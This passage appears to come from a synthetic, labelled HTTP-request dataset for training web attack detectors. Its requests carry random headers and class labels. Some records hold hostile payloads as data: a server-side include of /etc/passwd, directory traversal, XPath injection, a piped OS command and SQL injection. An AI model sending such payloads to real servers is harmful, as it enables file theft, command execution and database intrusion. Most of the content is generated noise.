Cookie: Ec=78;WaxJDivw=tte6cn8tsmhns;74rs59plr9h1=57805;49sChct=0emlh:n) at>tps3https;1riwe=nnftio7lamkNultc
Cookie2: $Version="72"
Date: Thu, 16 Sep 04 23:59:50 CET
ETag: "K1Fub7klIvNIjnohILe"
Expect: dsem
From: ttgier@4iiZc.be
If-Modified-Since: Thu, 15 Jun 06 15:22:37 GMT
If-Unmodified-Since: Thu, 02 Dec 04 14:57:14 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 24 Jan 10 15:04:20 CET
Max-Forwards: 7
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM dGhkZkJhc241Z2RlRXF6YWl4bGFobGFzOGhhcnJPYXR4dG90aGllbmhzcGdz
Authorization: NTLM dXNoZzNvY2xlTmhTYWdobmVpYWNzZWFEbG1vbm9mM2VraWExbndlamZuYQ==
Range: 4696-5,-34840
Referer: /busA/jeasp/e3d0xmtf.fgf
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: wle1reNh (hGtXLj; 3AXDpjXHb; a7@nnS4dqq; y9R4@oA)
UA-CPU: Sparc
UA-Disp: 5896,055,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 012x8198
Via: HTTP/0.2 www.eCcT.jpg
Transfer-Encoding: compress
Upgrade: mhcsbe/5.4, rea/6.1, rvnsK6/9.4, i1O/4.3, dsl/5.2
Warning: 801 www.tnclaoit.jpg "crNhnstf" "Mon, 23 Mar 09 09:36:08 GMT"
X-Forwarded-For: 227.174.126.186
X-Serial-Number: 8769415
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22579
Start - Id: 24259
class: Valid
GET /aOX4wW3xmPx8diNkw8cF/ara3/gCstroNeiseii6reAaro/tgxmsD@OwE4_8LaG@d/TsdfigrMoeie/yr6bat/BnandpcRFxmlVXSHzh..gif?XjeyNXhomenullo.3=e6w&2deeuNclliiSt=9666&_Y4SupdateTba21=a0eovthuoSvainXus&25vqVC3open=74&asmsekcfrkmbet=%2FL9e+taIiohtz&HXkKktRQ17T=oaiedmocha&9bE=9+execEthr+i&lhvLre=7w9&hoknitd=94579 HTTP/1.1
Host: 146.129.0.115:2728
Connection: keep-alive
Accept: text/*;q=0.6, image/*, application/*;q=0.4
Accept-Charset: windows-1257;q=0.3
Accept-Encoding: 
Accept-Language: 2-hnluehp3, 1sihh9-S5;q=0.0, vi5aune-AfmrEla, ed-ciret6Lb;q=0.4
Cache-Control: only-if-cached
Client-ip: 196.189.89.236
Cookie: lFezgggxeec=0251909;Sh9dhljhahun0d=tentoa:hiframe;Dsconnect.-and-m=38465834
Cookie2: $Version="205"
Date: Sun, 18 Jun 06 09:11:37 GMT
ETag: "ArQsk1GEJIcLcye4SJ"
Expect: oeht=l9TsdoR;totD
From: 0acmo@nnrTii0.com
If-Modified-Since: Fri, 06 Oct 06 03:48:27 GMT
If-Unmodified-Since: Wed, 21 Jan 09 18:53:56 CET
If-Match: *
If-None-Match: "0F7oUJ_gm7DS-c5Li"
If-Range: Mon, 07 Feb 05 03:15:46 CET
Max-Forwards: 1
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: praul1 nnstat=aopbsid
Authorization: eOgei rems=ollllyt
Range: 37292-,283-07038
Referer: /ehthea/tsts/Sasex/dyit.tiff
TE: chunked,deflate;q=0.2
Trailer: Accept-Charset
User-Agent: emlhwserZ/2.1.1
UA-CPU: PowerPC
UA-Disp: 097,7605,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 982x566
Via: 0.6 www.twRstsir.shtml:9992
Transfer-Encoding: a02e
Upgrade: nmsBw/3.6
Warning: 562 www.dneRs.shtml "nnE7halnnAu8" "Sat, 18 Nov 06 18:27:26 GMT"
X-Forwarded-For: 197.180.62.9
X-Serial-Number: 2123375255700978205
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24259
Start - Id: 8932
class: Valid
GET /iikcoainq2otiry/sRMz4MMDSHB7kwbeGufD.html?laaEworeahm7dt3=y+tupdate&vtjtzfmNew3tote=nrRo&qrareidN3eeszrr=kH8t&et=dnetab&2YpnullhomeL3=aaaoi&49otYllYur=%24g%3EnnriRczgs%5D%5Ditrra&trorehnhoee=77&cl=63&wa9m5object=neaernmne&tzo2lnidntat=n1P&eeA1ohEs=55127&thnD8iefRueSHt=63&XzM92junionj=ee8hiOy-si%3FAls&dnhc=tIhid&.telnetQUIjJh=+ee4dmadminnetcata HTTP/1.0
Host: 25.10.205.99
Connection: tltane
Accept: text/*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: identity, compress, compress;q=0.0, identity;q=0.7
Accept-Language: ao-bhe;q=0.3, n-nreaEs
Cache-Control: max-stale
Client-ip: 237.202.15.142
Cookie: ufgoIoPar5=(uengroup byxn ]emsrrmi;wt=i=;somteescehh5=eM2p@6-rM.63;hwtx=yi
Cookie2: $Version="7"
Date: Thu, 10 Mar 05 13:43:25 UTC
ETag: W/"Syt@IUu-1scZjXzrb"
Expect: Tdutlh=aUeys
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Fri, 06 Mar 09 10:17:14 CET
If-Unmodified-Since: Sun, 21 Nov 04 11:26:26 GMT
If-Match: *
If-None-Match: "J3Z.An5G4oLB1K7KvW"
If-Range: Sun, 24 Oct 04 17:44:36 CET
Max-Forwards: 68
MIME-Version: 7.6
Pragma: NotmEspG=Emiiehde
Proxy-Authorization: Basic cm9kMGhuMjpvYUl5enZvaA==
Authorization: Digest qop=Eeeklo
Range: -62,3-,2943-
Referer: http://www.twivn.st/o0lRaqhi/biiuxut/Azrsi/jarrl/tanmaois.asmx
TE: trailers
Trailer: Cache-Control
User-Agent: tq7actpkxY (eqiDBVI; sa_hxj)
UA-CPU: x86
UA-Disp: 8362,583,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 922x364
Via: 5.8 247.115.225.145, FTP/8.9 www.pteg.html, peu/1.2 www.lejttTe0.gif
Transfer-Encoding: identity
Upgrade: D54Tc/5.2
Warning: 571 130.163.218.71 "0rarimveh" "Tue, 26 Dec 06 12:43:48 GMT"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 2309739328693476356
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 8932
Start - Id: 32936
class: Valid
PUT /dkB/soadq7ca78fe/1yrgSjl11thbKeClehko/n2RmO/ydesqdsas4shId/l.C8HyphsHAfZyjPQ/vmivhenroskax/iewwltlptwzfruzo83.asmx? HTTP/1.0
Content-Length: 143
Content-Language: o637si3
Content-Encoding: identity
Content-Location: /tlilie0t.jpeg
Content-MD5: aDA2cjhhZXp0OWVodDRtcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 28 May 04 11:41:34 UTC
Last-Modified: Fri, 30 Mar 07 07:57:05 GMT
Host: www.mrbiiumop.st
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: windows-1251, utf-8, cp-950, ks_c_5601-1987;q=0.5, windows-874
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 80.13.212.23
Cookie: cryteowqfohmte=8e1j;reMwar=7EUwfh8Jj;heuu3ncb5E=rzonsAtte
Cookie2: $Version="73"
Date: Fri, 01 Oct 04 21:34:48 CET
ETag: "0@CY0H.LM9MHonM4_Mj"
Expect: u9gathqa=n7owux;ahnene=nAnesmhc
From: cpts@U3ei.ch
If-Modified-Since: Thu, 28 Feb 08 01:39:27 GMT
If-Unmodified-Since: Wed, 17 Sep 08 10:45:34 CET
If-Match: "yhNyzjjMiiPJt5NLYjc"
If-None-Match: *
If-Range: "_A8f2N.GjWu016xGa"
Max-Forwards: 952
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM YXJhY2Vub3VPVGwzcGVpNUFyd2VHdWVvZWF1eXVneGxhZHNvaFVhZTMzRUVkZW8=
Authorization: Basic NHNpNjpoZ055b2xzcg==
Range: -47,-9,85075-
Referer: /efdv/teuei/asie/hutotsar/heanw.zip
TE: chunked;q=0.2,chunked,trailers
Trailer: User-Agent
User-Agent: y_QxhgwWH http://www.uE9ons.fr
UA-CPU: 68000
UA-Disp: 6130,7497,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6323x133
Via: 2.0 37.118.123.83, HTTP/0.1 www.rhca.gif, HTTP/6.1 www.ieHdr.css:4593
Transfer-Encoding: gzip
Upgrade: 6kra/2.6, aeln/1.8, nmsoir/6.4
Warning: 971 www.7qdioii.png "xiSeext9182" 
X-Forwarded-For: 96.92.231.105
X-Serial-Number: 58527573355
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oRR5N=968131&tuel=Uea|et[btelnetuwbo&_fjgb2E=oesrmhrooa|ef2&oetN=07261&rvAbfuTLt=167401&ianvaxy=3109128&ua5tzpgdb=h1a3rgc2g&bodyp-v=W+l

End - Id: 32936
Start - Id: 39549
class: SSI
POST /hyk/eD2zU.EQU./-V.2ioch/tn/fsDFwAM7/o7SH@0GbLUu/eyltAsopuituEyo/tir7sNybnsEaoae/teulf7f/n@/xg/sh.mspx? HTTP/1.1
Content-Length: 99
Content-Language: T,lzoibEc,M
Content-Encoding: compress
Content-Location: /te1afcai/0tEkstg/nJfGaI/tshox4.jpeg
Content-MD5: b284bWRuaWVjaWVzcmFpZw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Jul 09 09:52:06 UTC
Last-Modified: Thu, 21 Sep 06 14:17:28 GMT
Host: www.p7blms.net
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 94.165.84.44
Cookie: oed6nHsCSa=%doirlue>gbgsoundy;rmAhtP2eiplE5ds=t;qse
Cookie2: $Version="6"
Date: Sat, 07 Apr 07 03:54:18 GMT
ETag: "jH5nNBEG4Q3ydGqFcPDi"
Expect: 100-continue
From: resjr@ovdSf3ie7i.biz
If-Modified-Since: Thu, 28 Jul 05 18:18:03 CET
If-Unmodified-Since: Tue, 28 Dec 04 19:24:25 CET
If-Match: *
If-None-Match: *
If-Range: "3Z7-3ynm7.5r@1hq"
Max-Forwards: 37
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: tennta dsi10Hd=atah9ert
Authorization: rfejui tecolboq=iNrss8tl
Referer: /iud2.swf
TE: trailers
Trailer: Accept-Encoding
User-Agent: oVu@Rh http://www.topge.be
UA-Disp: 9090,6972,8
UA-OS: Windows 95
UA-Color: color32
Via: FTP/7.1 94.79.90.11:60453, 3.6 www.t3uTwn.png:87, HTTP/3.8 40.112.111.113
Transfer-Encoding: deflate
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 538 www.8nsfo.jpg "eTpenvt3cmheHz" "Sun, 09 Nov 08 07:42:25 CET"
X-Serial-Number: 11507528452920010282
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pextss=<!--     #include   virtual="/etc/passwd" -->&tdYa=i)lP&Nrtueohyye7e=aEo

End - Id: 39549
Start - Id: 33749
class: Valid
POST /e0/dnAnkwXB9W@iZUm@9/gcari3i4goeats3/ms9utynp/5ti0kjhipne7tANes6h/sAt4s/rMetgn1tdcOseaeh/cx08MZICgvQu.msf? HTTP/1.0
Content-Length: 205
Content-Language: wmini6
Content-Encoding: compress
Content-Location: http://oosf.cz/efistl/Seieet.mp3
Content-MD5: aXBCMmM1bjhldGR5TnJvaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 Feb 09 07:13:21 UTC
Last-Modified: Sat, 20 Mar 04 16:26:49 GMT
Host: 159.195.140.244:8
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic, iso-2022-kr;q=0.2, utf-8
Accept-Encoding: *;q=0.9
Accept-Language: esieame-wseon
Cache-Control: min-fresh=2255
Client-ip: 61.80.211.225
Cookie: yvfrcpqmeta2=daROf;C6Ckiedhdtooc=96;dqa=4;9tstqee=rWsas_X0;snenAmUr=npCW4gt;@Exj=esammk;u~nr q9o
Cookie2: $Version="910"
Date: Tue, 16 Nov 04 15:50:27 UTC
ETag: "MsGdp5wimBxp1SC2-0"
Expect: 100-continue
From: ocSTi@saeeTeucT.ch
If-Modified-Since: Thu, 17 Jul 08 22:37:54 CET
If-Unmodified-Since: Mon, 20 Oct 08 09:29:54 UTC
If-Match: *
If-None-Match: *
If-Range: "kegbBhkCIyyS2cDv7k"
Max-Forwards: 048
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic MmhuaGQ6bHNucg==
Range: 157212-,-82365,95975-54243
Referer: /t8tgacm/j9oe8.sh
TE: deflate;q=0.4
Trailer: Authorization
User-Agent: Mozilla/9.6 (X11; U; Unix 7.4; in-is; rv:0.0.9) Gecko/26973422
UA-CPU: StrongARM
UA-Disp: 020,4035,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 520x205
Via: 8.9 11.238.25.136
Transfer-Encoding: compress
Upgrade: tdieig/6.9, dseib5/3.2, tse/9.5, xt7c/9.8
Warning: 146 www.heyaohc7.png "iqTeaiaieCen" "Thu, 28 May 09 11:14:53 UTC"
X-Forwarded-For: 79.156.30.170
X-Serial-Number: 695598853636
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eu=49&lgs3k0=1u o&dTedrnrE25s= c&eoasCiuei3eea41=lae7t<adt8s&hA7otti3p=sct&tboNwoi7j9TmCn=cAtDNzE6&oessoierwthgt=xlai&elho1iE=87113845&sicxmtyn=b0r0.R-R7&ui=s +;t4shutdowntrh&db=90480333&ntoWa=atr(

End - Id: 33749
Start - Id: 27923
class: Valid
GET /t15J9Pt8HOObd_ku/Emhsti4dtvlHhZ/ypJMzLOi5@d5_Wxf1lLm/lrHo.css? HTTP/1.1
Host: 209.50.36.23
Connection: nae4h6t
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip;q=0.7
Accept-Language: orwbt-50rcaew;q=0.5
Cache-Control: gfa='o3cir'
Client-ip: 228.43.186.124
Cookie: sBaayhreliift=68050003;Yrknph-slJx=eY uo;feA4tafrOsdGoe=34750230;AbietjcrgtMaseu=bs7usitI9hsalei
Cookie2: $Version="922"
Date: Mon, 19 May 08 21:00:37 CET
ETag: W/"TEv8HF7ZJ__Vznuc"
Expect: 100-continue
From: ethjhtno@OeeoEam.be
If-Modified-Since: Wed, 27 Apr 05 01:41:07 GMT
If-Unmodified-Since: Sun, 08 Aug 04 14:45:57 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: dtcNb Scowe1=gzontqb
Authorization: Digest nc=1d4672Ba
Range: -14621,-370256
Referer: http://www.creern.ch/eGphwnhe/oion/0eijatMt/rni4sre4/ozgyCxae.fgf
TE: trailers
Trailer: Expect
User-Agent: Mozilla/4.9 (compatible; MSIE 8.7; Open BSD i586; ldheaz3)
UA-CPU: Sparc
UA-Disp: 3738,726,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4388x7796
Via: 4.7 234.143.98.38, 7.1 188.115.241.92
Transfer-Encoding: deflate
Upgrade: rne/3.6, coinw/3.3, ouw3/6.5, cro/1.1
Warning: 133 www.lJae.css "ewiowestteogamnuhux" "Sat, 06 Oct 07 10:45:03 CET"
X-Forwarded-For: 122.177.179.211
X-Serial-Number: 149066712456
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27923
Start - Id: 16127
class: Valid
GET /sBkxnl1plalcp/m22eEleE/tenyratlqsbe/ogEcl6YZVruj/VUv7bnhnodexCzp9w/fM-aZvzh/wknfANEs3pPX96HFU/r7diBI20hko-V.swf? HTTP/1.0
Host: 77.117.139.179
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: ud-nAoagXn;q=0.2
Cache-Control: min-fresh=9121
Client-ip: 52.195.250.238
Cookie: UQ5dtpIj=aj0nnJwjYu;leas9y5ytAjnog=8 etsa9pydkrs inputnsW;e4qee= ce scriptlnn&dcsUmSx;oOU5tii=p2Gd0NjH.Si;hriUvbscriptC5=ouOaxdcr)ipbrsl
Cookie2: $Version="7"
Date: Thu, 23 Oct 08 15:33:57 CET
ETag: W/"@@Ao_oS1B2xROh_kXJ"
Expect: 100-continue
From: eutnTors@herbtLcsty.fr
If-Modified-Since: Mon, 17 Jul 06 01:40:51 GMT
If-Unmodified-Since: Sat, 13 Jan 07 09:08:46 CET
If-Match: *
If-None-Match: "km201qEctfLtT8b"
If-Range: "l4L9zmqgWGfnNBP"
Max-Forwards: 9147
MIME-Version: 2.7
Pragma: stiHenbo='e'
Proxy-Authorization: Digest username="ra9laces"
Authorization: vzete 8eni9u=eDhge
Range: 396-,06-480,6-
Referer: /oEeeins/otons/nesmet.mdb
TE: chunked;q=0.1,trailers,gzip;q=0.8
Trailer: Pragma
User-Agent: h7doeh (uFhgoVf; oQX..hRh; eR1AQdYuG; ckIT1KVr)
UA-CPU: MIPS
UA-Disp: 235,1889,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 8164x933
Via: 6.5 www.dbcD2ao.html, a4rnN/2.5 www.cbSc.jpeg
Transfer-Encoding: mw2nh; r7he=avtnEhci
Upgrade: ro1tlo/3.6, tuh/6.6
Warning: 964 221.114.71.110:2492 "9tmf4asphah" 
X-Forwarded-For: 45.149.45.168
X-Serial-Number: 6495346475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16127
Start - Id: 29579
class: Valid
GET /oSL0-EUNLG9BX8u/hikSs@yoAAHMNYs/jQ7ium8/ytTnw2nterhl8/tlWlA8/m7w6aeesbd6Let/v2FzRpzta01/a8wp4T3ONXBu95D223/dRw0lbaAhawt4/lHImMnTasystemoEA5ch/hxbMbXY/Mnph-C.bin?inFjeEyah=rt+%2B&nhsenA=dCYkf&yssW7Orwatsejpn=lfmee5ewlz&eje=edanohn%2Feygc%2FN HTTP/1.1
Host: 21.132.184.208:80
Connection: h5rtes
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 241.190.126.224
Cookie: e5csmtd7Ds2=15333420;dtLos=r jl;erNnnbeEtte=aPmlv9;dwhhta=iTeiisqun
Cookie2: $Version="24"
Date: Thu, 03 Nov 05 18:40:50 CET
ETag: "1WYlWphnw6vMC-PjkoZ"
Expect: 100-continue
From: d1em@0njeio.be
If-Modified-Since: Thu, 02 Sep 04 05:59:45 UTC
If-Unmodified-Since: Wed, 16 Feb 05 20:49:29 CET
If-Match: "_diIQnrfXAKX5R99enS"
If-None-Match: "eAw1NHLVwU9v-udysPtc"
If-Range: *
Max-Forwards: 7
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM OEExbjJIdHVzcjlzNDhlbHVwbWpjd3A4OXRwRTlkaXI=
Authorization: c1toak Canboa=bESmil
Range: 6781-71993,05-026,-006640
Referer: /f4ma/elmrhay.php3
TE: gzip,chunked
Trailer: Trailer
User-Agent: Mozilla/3.5 (Machintosh; U; PPC 0.4; qr-1e; rv:6.5.0) Gecko/08343053
UA-CPU: 68000
UA-Disp: 872,513,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3909x9569
Via: HTTP/8.1 175.66.149.231, HTTP/5.9 www.2eett.gif
Transfer-Encoding: gzip
Upgrade: 36yuhe/7.5, orrXnN/3.1, piil/2.2, er2iuu/0.7
Warning: 104 www.hlxEi9.htm:081 "oayabextiat9eH" "Mon, 21 Jan 08 17:09:27 CET"
X-Forwarded-For: 41.83.226.161
X-Serial-Number: 755614
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29579
Start - Id: 45650
class: PathTransversal
GET /pde/jpVI/iv0hN4ngnrTmn@ZF.htm?ciuj=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat HTTP/1.1
Host: 102.134.240.103
Connection: iuaiitni
Accept: audio/basic;q=0.2
Accept-Charset: x-mac-greek;q=0.8, iso-8859-4, x-mac-arabic
Accept-Encoding: *;q=0.4
Accept-Language: eyr-G6uudh
Cache-Control: min-fresh=20
Client-ip: 49.59.138.232
Cookie: replaceZDkD=25
Cookie2: $Version="427"
Date: Sun, 04 Jul 04 23:44:11 UTC
ETag: "@9jfyx5Jsp9gY1D-"
Expect: 100-continue
From: f6eo@ixbm.net
If-Modified-Since: Wed, 03 Mar 04 19:06:46 GMT
If-Unmodified-Since: Wed, 10 Mar 10 22:57:48 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 08
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic dG5vczpJbmkxZQ==
Range: 6451-1616,73067-
Referer: http://www.ro4ie.com/Onne9/Osuinnfa/kwnadn/cuEdoqo.pdf
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: ttiujyorh (6Q1OQQNj; 96Ajt5i1a)
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 822x7787
Via: HTTP/9.2 www.taayee.shtml
Transfer-Encoding: npem; 4tirq1=vykbdsk
Upgrade: 8mc5/8.9
Warning: 702 www.ikMktgs.gif "4eeenmnrnbeDidot" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 4318148965798
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45650
Start - Id: 49979
class: XPathInjection
GET /s8fxLYGmzP25rW/nle39/iouortsoer5/jf/mch/ise9ad5eccumeeyt5twr.cgi?tIopsei3b4hcrrt=%7Erteoay+&iihhaemp5di=ctv%3Cryn&dyhnpso=88&rtF=hnairtariltbOdn&XMbSWBSSR-d=dayip&raaais=442775262&Q4tJZconnectfVYVxx=Btr4h&ry19B.ym1=owitmweNste3oi&L888SechowJEzQ=ssnoLytuanahtcc&neche=6151948511&8elmdrilae=nmdm3c%27+++or++++6+%3C+++count%28path%2Fchild%3A%3A*%29++or+%27iw0%27+++%3D+++%27&1PZmNTeSEwU=aenqQI1m HTTP/1.0
Host: 148.127.135.215
Connection: r3cruxur
Accept: audio/*;q=0.3, video/quicktime;q=0.7
Accept-Charset: iso-8859-9;q=0.6, x-mac-arabic, iso-8859-15
Accept-Encoding: identity;q=0.1
Accept-Language: *;q=0.6
Cache-Control: min-fresh=38
Client-ip: 156.223.154.24
Cookie2: $Version="372"
Date: Sat, 20 Mar 04 01:50:17 UTC
ETag: W/"o_kvEAaAscQ3k6U"
Expect: etuerprO
From: aihryej@wvtazei.be
If-Modified-Since: Fri, 06 Oct 06 02:54:24 CET
If-Unmodified-Since: Mon, 16 May 05 12:22:07 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Mar 07 14:25:03 UTC
Max-Forwards: 82
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: lIa6N tRl9n=obihRto
Authorization: NTLM eUNnaWxmTEFzbm9hRTFlaW5lb25sZ3NobGVseHNoc29rbm9k
Range: 30900-
Referer: /6lcs.htm
TE: trailers,trailers
Trailer: If-Match
User-Agent: srebn/3.4.4.1
UA-CPU: 68000
UA-Disp: 1888,408,16
UA-OS: Linux
Via: 9xss/2.8 www.eteYr.png, evto/4.1 www.nqdee.jpg
Transfer-Encoding: identity
Warning: 600 www.tyasn.png "ttssqsuo3onte8ist" 
X-Forwarded-For: 10.220.189.114
X-Serial-Number: 6790519632
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49979
Start - Id: 42871
class: OsCommanding
GET /s4qr/BetcBPincludevwlibLvTMk/xterm29/aWOpKVlx3yYNoRiQtkD/rEWuEh/m-/sehreareleRoitieyln/dCQg.tiff?ozntEAl2e6=0952345&4tamgE=34&aPoeeeZc=6143101&8Splgn2dxsrc=gRlsw4dpoe&S2h9m=53188&7retvdre=%7C+++++dir+++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+++%2C&7BJh1ie=8&FCrmxrSB-@=0161160 HTTP/1.1
Host: www.tunii.com
Connection: sytsP5
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hr-frgyin, dn7h-hlcmtf;q=0.6
Cache-Control: no-store
Client-ip: 254.89.206.17
Cookie: sftt=ene
Cookie2: $Version="05"
Date: Tue, 20 Sep 05 21:11:54 UTC
ETag: W/"DFX@tZVgvg@-RMrr"
Expect: 100-continue
From: rltnk@9tih3Enaa.uk
If-Modified-Since: Wed, 28 Mar 07 03:13:19 CET
If-Unmodified-Since: Sat, 25 Jul 09 17:24:16 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 9.7
Pragma: Rsui=ehiSotr
Proxy-Authorization: Basic YXNmZDp0bW84dHo=
Authorization: NTLM bHNtaVNzYnRuY2NvdDI3NXJkYWFmbnREZWF5ZWhmN2loZTFhaWk=
Range: 8533-,2458-
Referer: /iqas/aehdEipi/ii6Hs/nh2alzwR/alcoesxo.php4
TE: trailers,gzip;q=0.5
Trailer: Via
User-Agent: gaenrnrnbsd
UA-CPU: x86
UA-Disp: 0286,0560,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 625x3364
Via: HTTP/7.8 3.36.6.54, HTTP/5.7 159.70.36.254
Transfer-Encoding: compress
Upgrade: gveGs/4.5, yshrh/3.9, mYo/3.1
Warning: 323 162.27.151.212 "63fpil54l" 
X-Forwarded-For: 67.174.254.77
X-Serial-Number: 646833
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 42871
Start - Id: 22954
class: Valid
GET /egXp.5S-2/teRWitncF2/rmHSaFk/nyegyhsn/ar1oo3syGZR2-/etaiie/pxo0/cona1r.php3?tmo=gnEb HTTP/1.1
Host: www.elrn.de
Connection: keep-alive
Accept: image/*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: awrai0-4i3;q=0.9, kmwff01m-ptlasEt, mlt4ssan-a9gqnha;q=0.7, tu1pbs-eY, sea-t2ehlaj8
Cache-Control: min-fresh=43
Client-ip: 67.214.101.60
Cookie: t6gonbhNj=eBP-Jum
Cookie2: $Version="33"
Date: Thu, 18 Feb 10 19:14:49 GMT
ETag: "ccKk8LrcO2k1cAc2Rtw"
Expect: otsud
From: ebcNord@jpan.biz
If-Modified-Since: Mon, 10 Oct 05 02:46:39 GMT
If-Unmodified-Since: Sun, 09 Oct 05 09:41:39 CET
If-Match: *
If-None-Match: "6Agu-BhhPEyDhM5"
If-Range: Mon, 17 Jan 05 13:40:10 GMT
Max-Forwards: 3160
MIME-Version: 1.1
Pragma: oOtplhe0='oei'
Proxy-Authorization: Basic dHByY2xVOmxmZTFP
Authorization: NTLM c3hkbHlwdHNuaG9tcWllYTVsdGZlaG5odDdubDF0QWRyb2t1RTk=
Range: -294148
Referer: http://www.0idtebn.de/rofa/iitL/Tw0lur/0titsaM/ha7ahrn.jpg
TE: trailers,chunked
Trailer: Pragma
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 2.8; nl-qT; rv:6.6.8) Gecko/68349456
UA-CPU: 68000
UA-Disp: 164,400,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 159x1338
Via: aka0ne/4.1 240.204.123.198, FTP/2.9 247.139.111.253, 5.0 www.tlmeuR.jpeg
Transfer-Encoding: identity
Upgrade: rnr2u/8.9, NBtv8d/1.1, cmOm1/0.6
Warning: 349 167.176.37.95 "eumteoh1rgy6orin" 
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 08954851223
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22954
Start - Id: 41806
class: SqlInjection
GET /Umoydrit/5zAfmmY/hnesniso/ej1eAsieideyca/DuT_vFWdEYn/2E0ai7eb61ytrreb1a/iYgT@uw.msf?fthaEhSn4ndd=r4%26i%29zfmaeoZ0&eftr=%27+AND++++USER_NAME%28%29%3D%27lAm&nyM8eynetitutV=+oe HTTP/1.1
Host: www.icxeahio.gov:80
Connection: dtesth
Accept: application/*, application/*, image/gif
Accept-Charset: windows-1254;q=0.7, big5, euc-tw, x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=2
Client-ip: 175.74.180.28
Cookie: UeoEOautda=14;dlmn8obDm=eenorileentnhh3Nm;689YvRH6U2Z3=364407;odrEdn8eri1at=w f6a
Cookie2: $Version="94"
Date: Sun, 17 Sep 06 18:05:18 CET
ETag: W/"B9vez_6N2C2hWas2l"
Expect: 100-continue
From: ame9p@neehptrbo.fr
If-Modified-Since: Thu, 30 Jul 09 02:26:45 GMT
If-Unmodified-Since: Thu, 19 Nov 09 01:50:50 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Mar 09 02:38:58 CET
Max-Forwards: 5
MIME-Version: 4.3
Pragma: nner0e=nccidys
Proxy-Authorization: dgDa4v rdekp=aenneN
Authorization: Digest realm
Range: 340098-821
Referer: /sotsmrte/rdh4s.js
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.1 (X11; U; Open BSD i386 4.7; o3-Eu; rv:0.8.9) Gecko/54019810
UA-CPU: x86
